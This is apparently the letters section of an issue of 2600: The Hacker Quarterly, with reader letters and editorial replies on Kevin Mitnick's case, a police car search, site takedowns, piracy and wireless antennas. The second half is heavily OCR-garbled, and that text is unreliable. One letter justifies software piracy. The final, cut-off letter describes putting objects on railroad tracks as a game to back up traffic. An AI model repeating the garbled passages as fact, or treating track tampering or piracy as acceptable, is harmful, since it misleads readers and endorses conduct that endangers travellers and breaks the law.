You're very observant. But we really don't deserve the credit this time. The round building is actually Madison Square Garden with the surrounding ones being part of the Pennsylvania Station complex in Manhattan. Across the street (in the middle of the cover) is the Hotel Pennsylvania which is where the HOPE conferences are held. A trained eye can see the little bridge that hooks two of the conference rooms on the top floor together.

Dear 2600:
I am a 2600 subscriber. Recently by chance I viewed Freedom Downtime on Free Speech TV (FSTV) and was amazed to learn about the details of Mr. Kevin Mitnick. The reason for my letter is to basically express my opinion on the case. First of all, where is the American Civil Liberties Union? Have they ignored Mr. Mitnick's case? This is definitely a case for the ACLU.
Needless to say what Mr. Mitnick had to endure was unnecessary and illegal. I feel that the film should have concentrated a lot more on the constitutional issues and made it clear that one of our inalienable rights given to everyone living in the United States of America by the U.S. Constitution (the supreme law of the land) is the right to a speedy trial. What I fail to understand and what the film does not fully explore is how any jurisdiction was able to keep a man incarcerated for such a long time without a trial. The film leads me to believe that Mr. Mitnick was deprived of his freedom until he acquiesced to a guilty plea. Is this the case? Was the government holding him hostage in exchange for a guilty plea? Should this be the case, then the entire movement and Mr. Mitnick should file suit against all parties involved in the unlawful detention, and the civil liberties and constitutional abuses toward Mr. Mitnick. The film concentrated heavily on what Mr. Mitnick did not do, on the lies various writers were writing about, on the hacker community, and Mr. Mitnick's detention without a trial. But I believe it failed to drive the nail down to the core by not mentioning the constitutional erosion his case represented and the danger of his situation for the sake of all Americans. Please do not get me wrong, I respect all of the hard work that went into the film and the movement as a whole. I am just offering a perspective which I believe would get a stronger response from the legal and political community. I would not want to think that all of the hard work of the civil liberties movement of the 1960s or the injustices and the suffering of those who then fought very hard to keep the integrity of the U.S. Constitution and the Bill of Rights were suddenly forgotten when Mr. Mitnick was denied his freedom, placed into solitary confinement for eight months, and left incarcerated for about four years without due process!
Any state representative, Senator, or Congressman should hear Mr. Mitnick's story and all parties involved in this abusive behavior should be prosecuted. This is of paramount importance. Perhaps I am naive and I have too much faith in our Constitution and I cannot begin to imagine how these abuses could have been so blatantly executed by the authorities. Any competent constitutional lawyer should have been able to have him released. It is very very difficult for me to believe the events as they were explained in the film. I greatly respect the effort, time, and energy that went behind the scene and the entire Free Kevin network. However I cannot understand why one of the most powerful weapons and protection (the U.S. Constitution) was never mentioned in the film. Mr. Mitnick's liberty as well as all of our liberties are at great risk. His case should not be forgotten and the Free Kevin movement should evolve to the next level. A level of awareness, education, and realization where his case should be made known on legal foundations and the indisputable truths should be addressed and examined by professionals as well as political representatives of the people (there are still some honest ones out there). A level where the legal system should take steps to correct itself and publicly admonish those who were involved in this case. Otherwise we are all in great trouble. I conclude where I started. Where is the ACLU?

hawk 20041

All of the questions you asked are ones that we also struggled with throughout the making of the film. It's frustrating not to get clear and definitive answers. And we wish it were that easy to actually get justice after demanding it. For now, we'll have to settle for trying to educate the masses. Please help spread the word and maybe you'll manage to get some sort of response from those responsible.

Dear 2600:
I have to commend Kevin Mitnick and William Simon for their amazing book: The Art of Deception.
We have begun living in an era of secrecy and of suspicion, and still the weakest factor in any situation remains the human element. It's hard to give this book just praise without sounding like an advertisement. Amazing work, Kevin, simply amazing.

Poetics

Dear 2600:
I've picked up your last four issues and have found myself sincerely enjoying them because of your lack of bias. In journalism it's difficult to separate your personal feelings toward a subject from the writing you do on it, and 2600 is mainly focused on topics people feel strongly about. But what makes your publication superior, or unique in any case, is that you usually can't be caught putting down other people's views or campaigning your own. It's the mark of a well thought out organization of articles that allows your quarterly to maintain a calm composure during days of civil unrest... days that won't end while we are alive simply because the public remains apathetic while power-hungry fat cats grow fatter. I'm not going to the extreme here - insurrection is only necessary when we agree it's necessary, but readers and writers of your publication seem to be of the intelligent group that understands their rights and won't give them up without a struggle.

Nietzsche

Thanks for the kind words but we are most definitely biased. It's really impossible not to be, especially with this kind of subject matter. What's most important, as you point out, is to respect other opinions. Otherwise, there's little chance of a meaningful dialogue.

Dear 2600:
What's up with publishing an outdated article on shopping cart flaws (19:3)? The flaw that Mr. Moore discusses has been around for as long as I can remember and has been fixed, for the most part, by shopping cart authors that are worth anything. As a former site designer/network admin I ran into this problem with some shopping cart software way back in 1998.
I contacted the author and the problem was patched up within days. I'm wondering if Mr. Moore has informed the company in the article about their problem? If not, as an ethical "hacker," I think that would be the honorable thing to do. Our job is to help people learn from their mistakes, not punish them for it.

JaMmSr

We exist to report on discoveries and findings. Anything beyond that, good or bad, is extracurricular. As for this article, you seem to be against its being printed regardless of whether or not it was outdated. If all of the bugs were fixed before we printed them, then we would indeed be printing outdated info and getting more complaints like yours. But non-outdated info leads to implications (like yours) that we're punishing people and not being ethical. It seems we can't win.

Dear 2600:
Thank you for your reply to my letter regarding people's saved email files being shared on Kazaa. While I don't agree that reading other people's email which they are sharing is "clearly an invasion of privacy" in the same way that reading private mail my neighbor posts on a billboard on his front lawn wouldn't be, I respect your opinion on the matter. Also, I should have added that it's always best to email those found affected and let them know they're sharing the wrong stuff. I've gotten both thanked and threatened in response to that, which is nice.

Rob T. Firefly

We didn't mean to imply that the privacy invasion was your fault. And what you did certainly isn't a crime. But those who go around using other people's stupidity to invade their privacy are still invading their privacy, albeit in a passive way much like listening in on private phone calls broadcast in the clear. By letting the world know you performed a valuable service.

Dear 2600:
This is in response to HJH's article "A Nasty NT Bug" in 19:2. I'm happy to say that the bug reported in the article has been patched.
Whereas I am unsure when Win 2000 was patched, Win XP was fixed by SP1. Also, the current Beta of Win .NET is completely immune from this bug. I guess it just goes to show, when 2600 talks, Microsoft listens. Good show, and keep up the good work.

Jason Argonaut

It's quite possible this was reported in some other way but thanks for the good thoughts.

Dear 2600:
I agree with the philosophies of your magazine on one level. I've also noticed it is easy to get caught up in. And sometimes I find myself agreeing with what you advocate and other times questioning it. While I love the info, I have to question it. If we never questioned, we would all be sheep. While 2600 is definitely an authority in the hacking world (or underworld if that is easier to swallow), I urge the readers to mull over and ultimately question what they read. Because even if they are fellow hackers, you don't have to agree with them or their ideals. And as idealistic and good-sounding as 2600 is, that doesn't make it 100 percent correct. I'm not accusing 2600 of anything. I'm just saying that you should question everything to make sure it works for you. Being spoon-fed by other hackers is the last thing we need. Question This. Question Life. Question Star Trek. But more importantly, Question Everything.

Resurrection 20

We couldn't agree more. Unquestionably.

Injustice Department

Dear 2600:
While you may feel like this letter is an attempt at someone using you as a soapbox to rant about repression of their right of free speech, it is actually my acknowledging some intriguing similarities between your lawsuits and my job (if that makes any sense). I work at an adult video/toy store in California in a town of less than 10,000, although we serve approximately 100,000+ clientele from all over the area.
Due to recent events, our store will be forced to shut its doors forever due to ignorance and hatred aimed at us, simply because we are looked down upon by our local government and several religious circles. In more detail, the town government instated a law that prohibits any adult related shops from conducting business within 2000 feet of a school and 1500 feet from any church. This is ironic because we are two blocks away from an elementary school and four blocks away from our local Presbyterian church, and the law was instated two years after we had opened! Anyway, our store has always obeyed the strict laws that the state regulates our industry by, and we have always been in cooperation with these as well as any city ordinances, with exception to the one stated because of obvious reasons. We have been in constant court battles, won every single appeal, and still our local government has us in their crosshairs. The clincher here is a recent overnight arson attempt on our store which did approximately $45,000 in damage and also ruined our already tarnished image when the newspapers printed the city's response to it: "That is the kind of people that ****** Video World attracts. It is their own fault for bringing lowlife trailer trash into the city, and they get no sympathy from us." That is directly out of our local newspaper. The store owner decided to shut down in October. I now have to take two jobs to match the salary I was making in order to keep rent and afford tuition. My insurance has already been canceled and I have to pay $95 every other week for a bottle of insulin so I can live. Yet the most hurtful thing of all is that I have lost close friends, some family members have turned their backs on me, and I have even been refused service at a local grocery store because the owner knows where I work! And why exactly?
Religiously influenced and biased government taking a stranglehold on a privately owned adult shop simply because they decided to conduct business. Not because they did anything wrong, but simply because it existed and certain people didn't want it to. All the best with your endeavors. Thanks for telling it like it is instead of how they want us to think it is.

deejayredlOO II

We have no doubt that some of our readers will disagree but we find the above treatment all too common and symptomatic of some serious problems in our culture. Unless you were soliciting customers from the elementary school or leaving brochures in the pews of the church, you should have been treated as any other member of the community. This kind of coexistence happens in other countries all the time without any adverse effects. We, on the other hand, seem to be moving ever closer to a fundamentalist hell.

Dear 2600:
Thought I would tell you guys about my web host and how they have annoyed me. They were fine for about half a year, then suddenly a few days ago my site disappeared. All the files have been deleted and all that is visible is a placeholder. I have been locked out of the admin interface, too. What annoys me is that I had no warning, no explanation, and no chance of backup. It simply switched off. I have tried contacting them. They won't get back to me via email and their phone number doesn't work. It is companies like these that really disappoint me. It's gotten harder to find decent, proper companies that don't treat customers as if they were meaningless.

Mart

There are a couple of lessons here. Always keep your own backups. Never rely on people you don't really know to do anything except cash your checks. And whenever possible, try to run your site yourself. That way, the most you can lose due to someone else's incompetence, ill will, bankruptcy, etc. is a temporary loss of bandwidth.

Dear 2600:
I work as a delivery driver here in North Carolina and I usually get home rather late. I live in a fairly small town (2,000 residents and 10,000 college kids) and my car is very easily identifiable by the numerous computer related stickers on the back of it. I was stopped by the law at a license check... a fairly routine happening. They looked at my license and then asked me to pull off to the side - an officer would be with me shortly. After waiting for ten minutes, the officer who put me aside asked me to step out of the car. Now remember, I am a delivery driver, and common sense would tell you that I have a valid driver's license and also that I would not be under the influence of any substance (perhaps caffeine?). So naturally, I was a bit puzzled by this. He then asked me if he could search my car and of course I said (in a polite fashion), "No, you may not. I do not feel that there is any reason for you to search, and certainly no probable cause." Oh, but this officer found probable cause... there was a stack of 2600: The Hacker Quarterly in my back seat dating from 1998 through 2002. He said that this was a "suspicious magazine" and he was baffled that I would even think to have such a thing in my possession. I told him that I did not believe this was any reason or cause to search my car, so he called one of his boys over. They told me that I was interfering with an officer's line of duty and that I could be thrown in jail for such behavior. I am not one to get thrown in jail (especially at the age of 18, still living with parents), so I stepped aside. After a 30 minute search, they decided the car was fine and there was no reason to hold me any longer. They even had drug dogs there to sniff everything out... looking for that kilo of cocaine that every cop just knows is in there somewhere. Needless to say,
I think that this is a perfect example of what the media has done to "hackers" and the image they have drawn of us. I would love to press charges, but being an 18 year old entering college, I simply don't have the funds.

Evnglion

You acted entirely properly by questioning them, keeping your cool, knowing when to back down, and letting the world know what happened. Unfortunately this kind of thing will continue to happen. It's always a good idea to get as much information as possible from the scene - car number, badge number, names, etc. in the event that you decide to pursue matters later. Most people choose not to and we completely understand why.

Dear 2600:
First off, great magazine - you've managed to inform the hacker world of many new laws, news, ideas that otherwise we wouldn't experience through mainstream media. I had closely followed your trouble over the domain fuckgeneralmotors.com. Upon hearing this, I too was outraged that because a big corporation saw some offense to this, they should go strip away a component to our First Amendment. So in support of your effort, I registered www.generalmotorssucks.cjb.net. I successfully maintained the site which I linked to ford.com. But not too long ago, I found that my page had been shut down without notice, my password to my account was invalid, and I have had no contact from any .cjb rep. I am considering filing a lawsuit or at least notifying the public of this so they can also voice their concern. Any thought/word would be appreciated.

ini .source

Since you're using this company's name, they have the ability to simply disconnect you (although they seem rather immature for doing it the way they did). If you want to make any kind of statement using a domain name, you should register the entire domain name under .com, .net, etc. and then find service through the provider of your choice. If they shut that off, it's a much bigger issue.
Dear 2600: i was in Wal-Mart in Hammond, Indiana the other day - the day the Spider-Mart DVD and VHS came out. So J figured I'd go pick up a copy as long as 1 had the cash. So I walked over to electronics and stood in line. Note that l am 14 years old and I look more like 16. I asked to huy the Spider-Man DVD (they had it behind ihe counter) and they said You have to be 17 or older with ID to be able to buy this movie." Now ihe movie is freaking rated PG-I3 and to lop it off they had the VHS sluing right on shelves near the cash registers outside electronics and by music m Page 36 Page 37 electronics. Why in the hell would [hey card me for Spider-Man ? Just another case of morons power abusing. Dime Tanaka Definitely moronic behavior, if you re not in she mood for a confrontation with the store manager, we suggest writing o polite hut firm letter to She main headquarters telling them of your unpleasant experi- ence. Oftentimes this leads to some sort of resolution. Dear 2600: l gave a speech today at PM 1 and started by show- ing people how easy it is to get on wireless lief works even those that are encrypted. I'm scuta nervous now that I'll be hauled away in a black van tonight. J just fell the need to write something in case I'm never heard from again! It's a shame tit at we must live fearing that our aca- demic works will come back to haunt us. (1 also plugged 2600 during the speech.) Todd That's right, drag us dow n with you . Thoughts On Piracy Dear 26m: 1 am an avid software pirate. Much of the software that I use is pirated because 1 am one poor bastard. However, being a software developer myself, 1 realize the importance of getting what is due for your hard work Wail a minute? Huh? How can I develop soft- ware and condone piracy? I lene s my thinking on the matter. 
First of all, when I benefit in any way other than purely educational, I make a point of purchasing a full copy of whatever program I'm using. I had a pirated version of Dreamweaver for quite awhile. When I finally started posting real web pages developed in it, I purchased the full version (Version 3, but that's good enough for me right now). I also have a pirated copy of 3D Studio Max that I've had for years. The version I have is old, but I have fun with it. Will I ever use it in a professional sense? No. Should I pay massive amounts of money to use something that I just fart around with on occasion? I don't think so! Does the developer lose out because I didn't pay for my copy? Let's put it this way... if I were forced to decide today between keeping it and paying the money, or giving it up, it'd be no contest. I'd give it up. I don't need it that bad. I'd never used it in a way to justify the price. So what does the developer lose? Money that they'd never have anyway if their program were completely pirate proof? If the day comes, and I doubt it will, when I use what I create in 3DS Max for something more than idle fun, I'll pay for it. Until then, I see no loss by anyone. I hope others use the software I create in the same manner.

II269U

Questions

Dear 2600:
Does your magazine have any competition in its class? I'm sure you know many magazines do have competitors, however I've never seen competition to yours. I'm not trying to suggest anything negative about your magazine. It may look as though I am. I just enjoy this type of reading material and I get through your magazines pretty quickly because of that.

Super-Fly

There are plenty of Internet zines out there but we haven't found any other paper publications that are devoted to the hacker world. Occasionally we see an abortive attempt.
They usually don't succeed for a number of reasons - they try to get too big too fast, they get spooked by the legal threats and hate mail, or they simply realize what a commitment it really is. We need a good deal more zines covering this stuff not just here but all around the world.

Dear 2600:
I just read the article on 802.11b (19:2) and it told me 99 percent of everything I wanted to know about 802.11b networks except for the one thing I really wanted to know. In the article it said they used a "magmount antenna on the roof." How do I hook this up to the card - or does the card just use the antenna through osmosis? I would love to scan the surrounding area, but need signal strength.

In a TrAnCe

Many 802.11 cards have antenna jacks on them but for those that don't you're pretty much out of luck. You may want to ask google about your card and "antenna jack" to see if there is a way you might add one, but it's generally not a reliable hookup. Even so, you'll almost certainly need an adapter (commonly called a "pigtail") to go from your antenna's jack (probably an "N" jack - look for pictures) to your card's jack (probably SMA).

Dear 2600:
I was wondering why there is something strange on page 33 at the bottom of the page where it should say "Page 33?" Each time there is something different but it is never correct.

QuielSIuidow

We get more mail on this than on any other subject by far. And yet, everyone who writes in seems to know what page number they're talking about even though they claim the page number information is faulty! It defies all logic.

Dear 2600:
I have a folder on my computer that I cannot open or manipulate in any way. It is located in my C:\ drive and when I double-click it, an error message pops up that says "This folder does not exist." Can you tell me what has happened?

Phule_2k2

Your problem appears to be that you're running Windows. Other than that, this is one we weren't able to find an immediate answer for.
We'll let you know what we find.

Dear 2600:
I was wondering if you could please tell me who is the man on the right side of cover 19:3. Also if you could please enlighten me as to what "might" be on the disk and roll of film. Keep up the good fight - because of you the ideals and principles of many have been changed.

Quiet Riot

Answering these questions would undoubtedly lead to more questions and the need for more answers and a possible Senate inquiry. Let's just say it's a pretty picture and leave it at that.

Dear 2600:
Maybe I have something wrong or have misunderstood H.R. 5469. Why are radio stations that broadcast an FM signal to my car allowed to continue to simulcast over the Internet with no proposed legislation against them? Why have the Internet radio stations been singled out? Did I miss something?

ddShelby

Any Internet broadcast is affected in some way. Broadcast stations are no exception. But it serves to prove the absurdity of the legislation as broadcast stations can have as many people listening to them over the airwaves as they can get without incurring any extra fees. But for every listener on the Internet (which already carries a bandwidth cost for each stream), an additional fee is levied. Imagine what would happen if stations were charged that fee for every listener estimated by the Arbitron ratings service. The most popular stations would probably go broke. (Maybe it's not such a bad idea.)

Dear 2600:
I was wondering if an article about OfficeMax would be of interest. I've read the articles about Radio Shack and recently the one about Target, and I was wondering if your magazine would be interested in an article about OfficeMax. Things such as store security, breaking through the security on the HP Custom Computer Centers/logging in as administrator, the unix terminals, and other related topics. I would be more than happy to submit such an article if it would be of use.
Please let me know so I could get started. Thank you.

(ianjaf I

If we print an article about one retail outlet, naturally we're interested in others. That's not a guarantee we'll print this specific article but the topic certainly qualifies. The general rule of thumb is that if you have an article to write, just write it and send it. We may not print it but at least you will have written it which is generally a good thing to do.

Dear 2600:
I think that your magazine is the greatest. I read it all the time at my local Chapters Bookstore. I always v I n cover to cover. It's the best. I have a situation that I don't know what to do ii hi my neighborhood we have a fun game. We i ms on the railroad tracks to make the traffic i rn i mu come down. The winner is the one who ā¢ A the longest lineup of cars. I i i week I was sure I would win the contest. I i . i ii i busy day at 5 pm, I did everything properly. I : and came back an hour later to make sure